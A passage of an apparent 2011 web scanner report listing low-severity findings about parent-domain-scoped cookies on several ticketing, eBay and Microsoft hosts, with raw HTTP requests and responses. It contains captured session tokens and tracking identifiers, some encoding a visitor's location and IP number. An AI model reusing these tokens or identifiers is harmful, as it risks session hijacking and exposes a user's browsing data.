_fancat_session=BAh7EjoPc2Vzc2lvbl9pZCIlMDE4M2Q1OWNmMDhkNzQ1OTM2YmM3MzY2ZWUzMzhhYjc6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGkEIRfNFToSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NjgzMDI3NTU4NToRYmdfc3R5bGVfaWRzSSIABjsHRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAROhBzcHZfc3JjXzcwMVQ6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1z2huA5nTDigY6C29mZnNldGn%2BkJ06EXNwdl9zcmNfMTk4N1Q%3D--599dd929144daee7633c9982b135b8d1876ed56b; domain=fansnap.com; path=/; HttpOnly
bg_lvd=1311104083; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 19:34:43 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/events/search?q=U2+with+Interpol+(rescheduled+from+7%2f19)&p1=[Events%20source=%22vertical%22+qzeventid=%22f389669%22]&FORM=DTPEVE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420
If-None-Match: "1237402bfa716d1b23edce2a34ba2262"

Response

13.14. http://c.microsoft.com/trans_pixel.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://c.microsoft.com
Path:	/trans_pixel.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:27:49&Microsoft.NumberOfVisits=2&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; domain=microsoft.com; expires=Tue, 19-Jul-2011 15:57:49 GMT; path=/
MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:27:49&Microsoft.VisitStartDate=07/19/2011 15:27:49&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=68&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Wed, 18-Jul-2012 15:27:49 GMT; path=/
MS0=e2380e0986da4be1b66f0ac9e9764ae5; domain=.microsoft.com; expires=Tue, 19-Jul-2011 15:57:49 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&ti=Please%20Verify%20your%20Location&fi=1&fv=10.3&ts=1311089274738&sr=1920x1200&bs=1065x723&ms.gsfxversion=7.6.9.0&ms.sup_cid=intercontact&ms.sup_cln=en-us&ms.sup_ct=gp&ms.sup_ln=en-us&ms.sup_sd=gn&MS.LOCALE=en&ms.ssversion=GSS7.0&ms.eventseqno=1 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/common/international.aspx?RDPATH=dm;en-us;select&target=assistance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078474665:ss=1311077969178

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:27:49&Microsoft.NumberOfVisits=2&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; domain=microsoft.com; expires=Tue, 19-Jul-2011 15:57:49 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:27:49&Microsoft.VisitStartDate=07/19/2011 15:27:49&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=68&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Wed, 18-Jul-2012 15:27:49 GMT; path=/
Set-Cookie: MS0=e2380e0986da4be1b66f0ac9e9764ae5; domain=.microsoft.com; expires=Tue, 19-Jul-2011 15:57:49 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
Date: Tue, 19 Jul 2011 15:27:49 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

13.15. https://signin.ebay.com/ws/eBayISAPI.dll previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://signin.ebay.com
Path:	/ws/eBayISAPI.dll

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

nonsession=CgAAIABxOTVxdMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9DdYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXWZTMBTAAYUAcC3TRlMjVjZjVkLjAuMS4xMS43OC4zLjAuM3OY3B0*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
ds2=asotr/b13qzzzzzLCz^; Domain=.ebay.com; Path=/
ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E; Domain=.ebay.com; Path=/
dp1=bpbf/%23200010000000000004500702dd^vrvi/1%7C0%7C120749940240%7C4e32fe5d^tzo/12c4e25dd6d^u1p/QEBfX0BAX19AQA**500702dd^idm/14e272014^; Domain=.ebay.com; Expires=Thu, 18-Jul-2013 18:39:25 GMT; Path=/
ns1=BAQAAATErF7ITAAaAANgARlAHAt1jNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wbJTEBBjv23JNCoxnvDIMVQczNds*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
cssg=43ae68ff1310a02680b5d7a5ffb89bda; Domain=.ebay.com; Path=/
s=BAQAAATErF7ITAAWAAPgAIE4nIN00M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQFKABhOJyDdNGUyNWNmNWQuMC4xLjExLjgxLjAuMC4zABIACk4nIN10ZXN0Q29va2llmcFrAvoor5z2I5918AzcfwHQvMw*; Domain=.ebay.com; Path=/
lucky9=3520182; Domain=.ebay.com; Expires=Sun, 17-Jul-2016 18:39:25 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.16. http://t.mookie1.com/t/v1/event previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.mookie1.com
Path:	/t/v1/event

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session=1311100565|1311100565; path=/; domain=.mookie1.com
id=2814750682866683; path=/; expires=Sun, 12-Aug-12 18:36:05 GMT; domain=.mookie1.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/event?migClientId=3074&migSource=mig&migAction=minor-category&migRemarks=1 HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:05 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=2814750682866683; path=/; expires=Sun, 12-Aug-12 18:36:05 GMT; domain=.mookie1.com
Set-Cookie: session=1311100565|1311100565; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

13.17. http://www.fansnap.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fansnap.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgH7tQ64GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--7382d0abaaf72a07ec28bc0ebd8430ba3e768e1a; domain=fansnap.com; path=/; HttpOnly
vid=1342567440282625; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
lvd=1311101016; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 115
ETag: "d77c6a4a9298bbbbdb807bc3ffe96fee"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: vid=1342567440282625; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
Set-Cookie: lvd=1311101016; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgH7tQ64GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--7382d0abaaf72a07ec28bc0ebd8430ba3e768e1a; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 41554
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...

13.18. http://www.fansnap.com/developers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fansnap.com
Path:	/developers

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgE5q87AGOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--d9a3777cedf14b19a925974c0f762f2ddc6ee6dd; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developers HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/about
Cookie: ver=1; vid=1342567440282625; tvid=1342567440282625; _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgL58u68GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--5b44033c581130d6faa8811aaffe669fa3974944; POOLID=B; __utma=19633071.1263508421.1311101027.1311101027.1311101027.1; __utmb=19633071; __utmc=19633071; __utmz=19633071.1311101027.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; lvd=1311101038

Response

13.19. http://www.fansnap.com/la/pi previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fansnap.com
Path:	/la/pi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7CzoPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoRdG1wX3Zpc2l0X2lkaQQoXWQfOghsb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huA59dirgY6C29mZnNldGn%2BkJ0%3D--438f2131decc9bad39c93414732670435648c2b6; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /la/pi?m=_uid%3D526671144%3A256%3Apgswelcome%7C%252F%26_ctx%3D%26_ts%3D1311101015%26_st%3D%26_ma%3D13%26_ref%3D HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/
Cookie: ver=1; vid=256; tvid=1342567440282625; _fancat_session=BAh7CzoPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoRdG1wX3Zpc2l0X2lkaQQoXWQfOghsb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huAZxQ%2BrgY6C29mZnNldGn%2BkJ0%3D--84355d3e3b36e57d4500b80e76814ec0608d1c87; POOLID=B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Content-Disposition: inline; filename="ra.gif"
Content-Transfer-Encoding: binary
Cache-Control: private
X-Runtime: 8
ETag: "db04c7b378cb2db912c3ba8a5a774ee3"
Set-Cookie: _fancat_session=BAh7CzoPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoRdG1wX3Zpc2l0X2lkaQQoXWQfOghsb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huA59dirgY6C29mZnNldGn%2BkJ0%3D--438f2131decc9bad39c93414732670435648c2b6; domain=fansnap.com; path=/; HttpOnly
Content-Length: 43
Status: 200
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.20. http://www.stubhub.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.stubhub.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
TLTHID=7AEE7DDAB23610B20167D97254A5AD39; Path=/; Domain=.stubhub.com
STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; Domain=.stubhub.com; Expires=Thu, 11-Jul-2041 18:39:48 GMT; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298 HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
